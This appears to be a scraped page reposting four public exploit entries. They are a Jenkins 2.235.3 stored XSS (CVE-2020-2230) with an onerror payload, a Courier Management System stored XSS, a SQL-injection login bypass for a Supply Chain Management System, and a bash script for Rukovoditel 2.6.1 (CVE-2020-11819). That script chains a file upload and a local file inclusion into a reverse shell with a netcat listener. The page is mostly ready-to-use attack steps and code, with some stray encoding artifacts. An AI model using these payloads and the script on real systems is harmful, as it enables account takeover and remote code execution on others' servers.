    Jenkins 2.235.3 - 'Description' Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Jenkins 2.235.3 - 'Description' Stored XSS # Date: 11/12/2020 # Exploit Author: gx1 # Vendor Homepage: https://www.jenkins.io/ # Software Link: https://updates.jenkins-ci.org/download/war/ # Version: <= 2.251 and <= LTS 2.235.3 # Tested on: any # CVE : CVE-2020-2230 # References: https://www.jenkins.io/security/advisory/2020-08-12/#SECURITY-1957 https://www.openwall.com/lists/oss-security/2020/08/12/4 Vendor Description: Jenkins 2.251 and earlier, LTS 2.235.3 and earlier does not escape the project naming strategy description that is displayed on item creation. This results in a stored cross-site scripting (XSS) vulnerability exploitable by users with Overall/Manage permission. Jenkins 2.252, LTS 2.235.4 escapes the project naming strategy description. Technical Details and Exploitation: As it is possible to observe from patch commit: https://github.com/jenkinsci/jenkins/pull/4918/commits/7529ce8905910849e890b7e26d6563e0d56189d2 The fix to solve the vulnerability is applied in activateValidationMessage function to 'war/src/main/js/add-item.js' javascript file: function activateValidationMessage(messageId, context, message) { ... $(messageId, context).html('&#187; ' + message); // AFTER FIX: $(messageId, context).text('» ' + message); ... } The function is called during the creation of a new Item, on "blur input" event (when text element of name input is focused): $('input[name="name"]', '#createItem').on("blur input", function() { if (!isItemNameEmpty()) { var itemName = $('input[name="name"]', '#createItem').val(); $.get("checkJobName", { value: itemName }).done(function(data) { var message = parseResponseFromCheckJobName(data); if (message !== '') { activateValidationMessage('#itemname-invalid', '.add-item-name', message); // INJECTION HERE } else { cleanValidationMessages('.add-item-name'); showInputHelp('.add-item-name'); setFieldValidationStatus('name', true); if (getFormValidationStatus()) { enableSubmit(true); } } }); } else { .... activateValidationMessage('#itemname-required', '.add-item-name'); } }); as "message" param is the injection point, we need to trigger an "invalid item name": when you are creating a new item and the name is not compliant with validation rules, an error is triggered. Error message is not escaped for vulnerable versions, so it is vulnerable to XSS. Validation rules can trigger an error in several ways, for example: - if the current item name is equal to an already existent item name; - if a project naming strategy is defined: in this case, if the project name is not compliant with a regex strategy, a error message is shown. In the first case Jenkins seems to be protected because when a new project is created, it is not possible to insert malicious characters (such as <,>). In the second case, the error message also shows a description, that can be provided by the user during the regex strategy creation. In description field, it is possible to inject malicious characters, so it is possible to insert an XSS payload in description field. When the user insert a name that is not compliant with project naming strategy, the XSS is triggered. Proof Of Concept: 1. In <jenkins_url>/configure create a new Project Naming Strategy (enable checkbox "Restrict project naming") containing the following values: Pattern: ^TEST.* Description: GX1h4ck <img src=a onerror=alert(1)> 2. Go to New element creation section (/<jenkins_url>/jenkins/view/all/newJob). When you insert a character in the name field, alert is triggered. Solution: The following releases contain fixes for security vulnerabilities: * Jenkins 2.252 * Jenkins LTS 2.235.4
  23. HireHackking

    Courier Management System 1.0 - 'First Name' Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Courier Management System 1.0 - 'First Name' Stored XSS # Exploit Author: Zhaiyi (Zeo) # Date: 2020-12-11 # Google Dork: N/A # Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Category: Web Application Step 1: Log in to the CMS with any valid user credentials. Step 2: Click on the logged in username on header and select Manage Account. Step 3: Rename the user First Name or Last Name to "<script>alert(1111)</script>". Step 4: Update Profile and this will trigger the XSS. Step 5: Logout and login again and the page will display the domain name.
  24. HireHackking

    Supply Chain Management System - Auth Bypass SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Supply Chain Management System - Auth Bypass SQL Injection # Date: 2020-12-11 # Exploit Author: Piyush Malviya # Vendor Homepage: https://www.sourcecodester.com/php/14619/supply-chain-management-system-phpmysqli-full-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14619&title=Supply+Chain+Management+System+in+PHP%2FMySQLi+with+Full+Source+Code # Tested On: Windows 10 Pro Build 18363.1256 + XAMPP V3.2.4 #Vulnerable Page: Login Page #Exploit Open the Application check the URL: http://localhost/scm-master/ Open Login Page Enter username: ' or 0=0 # Enter password: ' Select Login Type: Admin click on login The SQL payload gets executed and authentication is bypassed successfully
  25. HireHackking

    Rukovoditel 2.6.1 - RCE (1)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Rukovoditel 2.6.1 - RCE # Date: 2020-06-11 # Exploit Author: coiffeur # Write Up: https://therealcoiffeur.github.io/c1010 # Vendor Homepage: https://www.rukovoditel.net/ # Software Link: https://www.rukovoditel.net/download.php # Version: v2.6.1 # CVE: CVE-2020-11819 set -e function usage () { echo "NAME: Rukovoditel v2.6.1, RCE" echo "SYNOPSIS: ./rce_2.6.1.sh <BASE_URL> <SID>" echo "DESCRIPTION:" echo "Upload file test.php on the remote server and trigger the file using a LFI" echo "AUTHOR: coiffeur" exit } if [ "$#" -ne 2 ]; then usage fi BASE_URL=$1 SID=$2 echo "Setting target: $BASE_URL" echo "Setting sid: $SID" echo "" echo "Extracting \$app_user['id']:" APP_USER_ID=`curl -s "$BASE_URL/index.php?module=users/account" -H "Cookie: sid=$SID" | grep "validate_form&id=" | cut -d '=' -f 3 | cut -d "'" -f 1` echo " => \$app_user['id']: $APP_USER_ID" echo "Setting arbitrary \$_POST['timestamp']:" TIMESTAMP=1337 echo " => \$_POST['timestamp']: 1337" echo "Calculating \$verifyToken:" VERIFY_TOKEN=`echo -n "$APP_USER_ID$TIMESTAMP" | md5sum | cut -d ' ' -f 1=` echo " => \$verifyToken: $VERIFY_TOKEN" echo "" echo "[*] Trying to upload test.php ... (Arbitrary File Upload)" curl "$BASE_URL/index.php?module=users/account&action=attachments_upload" -H "Cookie: sid=$SID" -F "timestamp=$TIMESTAMP" -F "token=$VERIFY_TOKEN" -F 'Filedata=@test.php' echo "" echo "[*] Trying to recover time() output:" TIME=$(date -d "`curl -si "$BASE_URL" | grep "Date:" | sed 's/Date: //'`"= +%s) echo " => timestamp: $TIME" echo "[*] Trying to recover the generated filename:"=20 FILENAME=` echo -n $TIME"_test.php" | sha1sum | cut -d ' ' -f 1` echo " => filename: $FILENAME" echo "[*] Trying to reconstructing full path:" DATE=`date +"%Y/%m/%d"` FULL_PATH=`echo -n "uploads/attachments/$DATE/$FILENAME"` echo " => full path: $FULL_PATH" echo "" echo "[!] Prepare a netcat listener by typing: nc -lvp 4444" echo "" echo "[*] Trying to update language settings ... (Local File Inclusion)" LANGUAGE="../../$FULL_PATH" curl -s "$BASE_URL/index.php?module=users/account&action=update" -H "Cookie: sid=$SID" -d "fields[13]=$LANGUAGE" echo "[*] Triggering reverse shell ..." curl -s "$BASE_URL/index.php?module=users/account" -H "Cookie: sid=$SID=" echo "[*] Restoring default language settings" curl -s "$BASE_URL/index.php?module=users/account&action=update" -H "Cookie: sid=$SID" -d "fields[13]=english.php" echo "> Done"